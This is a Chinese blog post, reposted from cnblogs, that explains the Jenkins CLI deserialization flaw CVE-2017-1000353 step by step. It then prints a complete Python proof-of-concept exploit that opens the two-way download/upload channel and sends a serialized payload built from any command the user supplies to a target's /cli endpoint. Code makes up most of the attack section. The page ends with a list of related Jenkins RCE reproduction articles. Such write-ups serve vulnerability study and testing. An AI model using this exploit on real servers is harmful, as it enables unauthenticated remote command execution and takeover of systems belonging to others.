Jenkins反序列化漏洞cve-2017-1000353

最新推荐文章于 2024-07-05 10:55:09 发布
最新推荐文章于 2024-07-05 10:55:09 发布
阅读量420 收藏
点赞数
文章标签: 运维 javascript java ViewUI
原文链接:http://www.cnblogs.com/KevinGeorge/p/8033375.html
版权

一、漏洞原理:

本地没有环境:参考:https://blogs.securiteam.com/index.php/archives/3171    进行学习理解记录。

首先这是一个java反序列化漏洞,一定是command在序列化信息中,反序列化时候直接执行了该命令。

攻击过程学习:

下文的session是一个uuid,类型4

1 #可以如下生成
2 session = uuid.uuid4()

1、首先要发送一个请求,是一个下载请求。这个请求是要启动一个双向数据传输频道。频道的标识就是session。而side字段则是用来标识传输方向

对应在代码段:

 1 def Download(url,session):
 2     headers = {'Side':'download'}
 3     headers['Content-type'] = 'application/x-www-form-urlencoded'
 4     headers['Session'] = session
 5     headers['Transfer-Encoding'] = 'chunked'
 6     try:
 7         response = requests.post(url,data=Null_Payload(),headers=headers,proxies=Proxy,stream=True)
 8     except Exception,ex:
 9         print ex
10         exit(0)
11     print response.content

然后是第二个请求:双向信道发送组件,第一个请求被阻塞,一直到第二个请求被发送。此时session与之前保持一致,side改成upload。

数据部分格式规范如下:

(1)前导码

前导码包含一个base64编码的序列化对象。“ 能力 ” 类型的序列化对象只是告诉服务器
客户端具有哪些能力(例如HTTP 分块编码)。

1 Premle='<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='

(2)Proto部分 (可能是所说的额外字节)

1 Proto = 'x00x00x00x00'

(3)payload部分

在前导码和一些额外的字节之后,Jenkins服务器期望类型为Command的序列化对象。由于Jenkins不验证序列化对象,所以可以发送任何序列化对象。

1 def Payload_Init(command):
2     global File_Serialization
3     command = "java -jar jenkins_payload.jar payload.ser '%s'"%str(command)
4     print command
5     return_number = os.system(command)
6     if return_number != 0:
7         print "Call Jar Packet To Init The Payload Error"
8         exit(0)
9     File_Serialization = open("./payload.ser","rb").read()

所有第二个数据包发送的数据整合:

1 def Create_Payload_Chunked():
2     yield Premle
3     yield Proto
4     yield File_Serialization

发送第二个数据包:

 1 def Upload_Chunked(url,session,data):
 2     headers = {'Side':'upload'}
 3     headers['Session'] = session
 4     headers['Content-type'] = 'application/octet-stream'
 5     headers['Accept-Encoding'] = None
 6     headers['Transfer-Encoding'] = 'chunked'
 7     headers['Cache-Control'] = 'no-cache'
 8     try:    
 9         response = requests.post(url,headers=headers,data=Create_Payload_Chunked(),proxies=Proxy)
10     except Exception,ex:
11         print ex
12         exit(0)

整个攻击流程

1 def Attack():
2     print "start"
3     session = str(uuid.uuid4())
4     thread_object = threading.Thread(target=Download,args=(Target,session))
5     thread_object.start()
6     time.sleep(1)
7     print "pwn"
8     #Upload(URL, session, create_payload())
9     Upload_Chunked(Target,session,"asdf")

服务器端对应处理

反序列化command对象

然后这个方法在这里被调用

返回了这个序列化好的对象cmd

read方法调用,把返回的对象赋值给了cmd,也就是被读进一个ReaderThread类型的线程。

该线程由类“ CliEndpointResponse ”中调用的“ upload ”方法触发。

在该方法中,HTTP主体数据被读取,并且调用“notify”方法来通知线程。

整体POC

  1 # -*- coding: utf-8 -*-
  2 """
  3 援引自:https://7f52.com/?p=450
  4 重构人:陈然
  5 公司:360企业安全集团
  6 """
  7 
  8 #需要引入的库文件
  9 import os
 10 import uuid
 11 import gzip
 12 import zlib
 13 import time
 14 import urllib
 15 import socket
 16 import urllib3
 17 import requests
 18 import threading
 19 from optparse import OptionParser
 20 
 21 #全局变量定义:
 22 #Proxy = {"http":"http://127.0.0.1:8090","https":"http://127.0.0.1:8090"}#HTTP、HTTPS协议代理设置
 23 Proxy = None#HTTP、HTTPS协议代理设置
 24 Target="http://%s:8080/cli"#攻击目标
 25 Premle='<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='
 26 Proto = 'x00x00x00x00'
 27 File_Serialization = None
 28 socket.setdefaulttimeout(3)
 29 
 30 
 31 #全局函数定义
 32 def Payload_Init(command):
 33     global File_Serialization
 34     command = "java -jar jenkins_payload.jar payload.ser '%s'"%str(command)
 35     print command
 36     return_number = os.system(command)
 37     if return_number != 0:
 38         print "Call Jar Packet To Init The Payload Error"
 39         exit(0)
 40     File_Serialization = open("./payload.ser","rb").read()
 41 
 42 def Download(url,session):
 43     headers = {'Side':'download'}
 44     headers['Content-type'] = 'application/x-www-form-urlencoded'
 45     headers['Session'] = session
 46     headers['Transfer-Encoding'] = 'chunked'
 47     try:
 48         response = requests.post(url,data=Null_Payload(),headers=headers,proxies=Proxy,stream=True)
 49     except Exception,ex:
 50         print ex
 51         exit(0)
 52     print response.content
 53 
 54 '''
 55 def Upload(url,session,data):
 56     headers = {'Side':'upload'}
 57     headers['Session'] = session
 58     headers['Content-type'] = 'application/octet-stream'
 59     headers['Accept-Encoding'] = None
 60     try:
 61         response = requests.post(url,data=data,headers=headers,proxies=Proxy)
 62     except Exception,ex:
 63         print ex
 64         exit(0)
 65 '''
 66         
 67 def Upload_Chunked(url,session,data):
 68     headers = {'Side':'upload'}
 69     headers['Session'] = session
 70     headers['Content-type'] = 'application/octet-stream'
 71     headers['Accept-Encoding'] = None
 72     headers['Transfer-Encoding'] = 'chunked'
 73     headers['Cache-Control'] = 'no-cache'
 74     try:    
 75         response = requests.post(url,headers=headers,data=Create_Payload_Chunked(),proxies=Proxy)
 76     except Exception,ex:
 77         print ex
 78         exit(0)
 79     
 80 def Null_Payload():
 81     yield " "
 82     
 83 """    
 84 def Create_Payload():
 85     payload = Premle + Proto + File_Serialization
 86     return payload
 87 
 88 """
 89 
 90 def Create_Payload_Chunked():
 91     yield Premle
 92     yield Proto
 93     yield File_Serialization
 94 
 95 def Attack():
 96     print "start"
 97     session = str(uuid.uuid4())
 98     thread_object = threading.Thread(target=Download,args=(Target,session))
 99     thread_object.start()
100     time.sleep(1)
101     print "pwn"
102     #Upload(URL, session, create_payload())
103     Upload_Chunked(Target,session,"asdf")
104     
105 #程序入口
106 if __name__ == "__main__":
107     parser = OptionParser()  
108     parser.add_option("-t","--target",dest="target",help="Target IP address!")
109     parser.add_option("-c","--command",dest="command",help="The command to execute!")
110     parser.add_option("-p","--protocol",dest="protocol",help="Protocl is HTTP or HTTPS!")
111     (options, args) = parser.parse_args()
112     optionslist = [options.target,options.command,options.protocol]
113     if None in optionslist or "" in optionslist:
114         print "Please check your input parameters!"        
115     Target = Target%options.target
116     command = options.command
117     protocol = options.protocol
118     if protocol == "HTTP":
119         pass
120     elif protocol == "HTTPS":
121         Target = Target.replace("http","https")
122     else:
123         print "Unknown Protocol!"
124     Payload_Init(command)
125     Attack()

 

转载于:https://www.cnblogs.com/KevinGeorge/p/8033375.html

weixin_30593443
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jenkins RCE 漏洞复现(CVE-2017-1000353CVE-2018-1000861)
oiadkt的博客
09-21 1833
Jenkins 是软件测试过程中常用的一种持续构建的工具,Jenkins RCE 漏洞触发方式大致分为两种,一种使用 Jenkins CLI 触发,而另一种触发方式为 HTTP 请求触发。这里复现的 CVE-2017-1000353CVE-2018-1000861 就是两种触发方式的代表。
Jenkins-CI 远程代码执行漏洞CVE-2017-1000353
黑白的博客
12-07 1462
声明 好好学习,天天向上 漏洞描述 该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中。Jenkins利用此通道来接收命令,恶意攻击者可以构造恶意攻击参数远程执行命令,从而获取系统权限,造成数据泄露。 影响范围 所有Jenkins主版本均受到影响(包括<=2.56版本) 所有Jenkins LTS 均受到影响( 包括<=2.46.1版本) 复现过程 这里使用2.46.1版本 使用vulhub cd /app/vulhub-master/jenkins/CVE-2017-1000353/
Jenkins-CI 远程代码执行漏洞复现(CVE-2017-1000353
最新发布
m0_63082628的博客
07-05 811
Jenkins-CI 远程代码执行漏洞复现
jenkins 反序列化漏洞 cve-2017-1000353
whatday的专栏
06-13 1455
一、漏洞原理: 首先这是一个java反序列化漏洞,一定是command在序列化信息中,反序列化时候直接执行了该命令。 攻击过程学习: 下文的session是一个uuid,类型4 # 可以如下生成 session = uuid.uuid4() 1、首先要发送一个请求,是一个下载请求。这个请求是要启动一个双向数据传输频道。频道的标识就是session。而side字段则是用来标识传输方向 对应代码段: def Download(url,session): headers = {'Si
jenkins java反序列化_Jenkins Java 反序列化远程执行代码漏洞(CVE-2017-1000353)
weixin_31308407的博客
02-13 201
Jenkins Java 反序列化远程执行代码漏洞(CVE-2017-1000353)一、漏洞描述该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中,jenkins利用此通道来接收命令,恶意攻击者可以构造恶意攻击参数远程执行命令,从而获取系统权限,造成数据泄露。二、漏洞影响版本所有jenkins主版本均受到影响(包括<=2.56版本)所有的jenkins LTS均受到影响(包括&lt...
Jenkins远程代码执行漏洞检查(CVE-2017-1000353
weixin_30675247的博客
05-05 235
Jenkins反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限 漏洞影响范围: 所有Jenkins主版本均受到影响(包括<=2.56版本)所有Jenkins LTS 均受到影响( 包括<=2.46.1版本) 测试步骤: 1.下载生成反序列的payload: https://github.com/nobleXu/jenkins 2.生成...
[漏洞复现]vulfocus/jenkins-cve_2017_1000353
qq_45751902的博客
11-24 553
Jenkins反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限建议自己搭建环境复现,这个vulfocus上没有体现出反序列化漏洞,因为无法使用反序列化查看flag,最终使用弱口令登录,执行系统命令成功找到flag。
漏洞复现—Jenkins反序列化漏洞CVE-2017-100035/ CVE-2018-1000861
weixin_41438728的博客
11-17 255
转载来源:https://blog.csdn.net/weixin_45556536/article/details/109677547
漏洞复现】Jenkins-CI远程代码执行漏洞(CVE-2017-1000353
weixin_43486390的博客
12-18 886
0x01 漏洞描述 Jenkins存在未经身份验证的远程代码执行漏洞,经过序列化的Java SignedObject对象传输到基于远程处理的Jenkins CLI,在使用新的对象ObjectInputStream对其进行反序列化操作即可绕过现有的基于黑名单的保护机制。远程攻击者可利用漏洞在受影响的应用程序的上下文中执行任意代码,或造成程序拒绝服务。 0x02 影响范围 所有Jenkins主版本均受到影响(包括<=2.56版本) 所有Jenkins LTS 均受到影响( 包括<=2.46.1
JAVA反序列化漏洞知识点整理
01-20
jenkins反序列漏洞跟过一遍之后,虽说梳理清楚了漏洞触发的大体流程,但是对于JAVA反序列化漏洞导致代码执行的原理仍旧不懂,因此有必要整理JAVA反序列化漏洞相关的知识点。  JAVA反序列化漏洞  反序列化漏洞的...
cve-2019-1003000-jenkins-rce-poc:Jenkins RCE概念证明:SECURITY-1266 CVE-2019-1003000(脚本安全),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明式)
02-05
PoC:Jenkins RCE SECURITY-1266 / CVE-2019-... 更新: 的文章解释了利用CVE-2018-1000861和CVE-2019-1003000的漏洞利用链,绕过了对预身份验证RCE的总体/读取权限的需求: : 安装 $ git clone https://github.co
Jenkins自动化部署-----持续交付
01-27
感谢之前带领过我的leader,让我能够知道什么是好的开发方法。 在很早之前就接触过敏捷开发。什么是敏捷开发,简单来说就是让软件可靠地,快速地发布出来的一种开发方法和技巧。 而敏捷开发中有许多的实践,可能并...
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
Jenkins-PreAuth-RCE 漏洞详解】 Jenkins 是一款广泛应用的持续集成工具,用于自动化各种软件构建、测试和部署任务。在2019年,一个名为CVE-2019-1003000的安全漏洞被公开,允许未经身份验证的攻击者执行远程代码...
Jenkins 远程代码执行漏洞CVE-2017-1000353) 复现
YouthBelief的博客
11-25 4985
所有文章,仅供安全研究与学习之用,后果自负! Jenkins 远程代码执行漏洞CVE-2017-1000353Jenkins 远程代码执行漏洞CVE-2017-1000353)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 Jenkins 远程代码执行漏洞CVE-2017-1000353) 0x01 漏洞描述 Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交
Jenkins远程代码执行漏洞CVE-2017-1000353
公众号shadow sock7
01-31 3070
复现环境: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353 复现 使用Intellij Idea打包java为可执行jar包参考: https://blog.csdn.net/xuemengrui12/article/details/74984731 ...
jenkins漏洞安全漏洞CVE-2022-2048和CVE-2021-28169
05-20
CVE-2022-2048是Jenkins中的一个安全漏洞,存在于Jenkins的SSH插件中。攻击者可以利用该漏洞通过SSH连接到Jenkins主机并执行任意命令。该漏洞的CVSS评分为9.8(最高10分),属于严重级别。 CVE-2021-28169是Jenkins...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值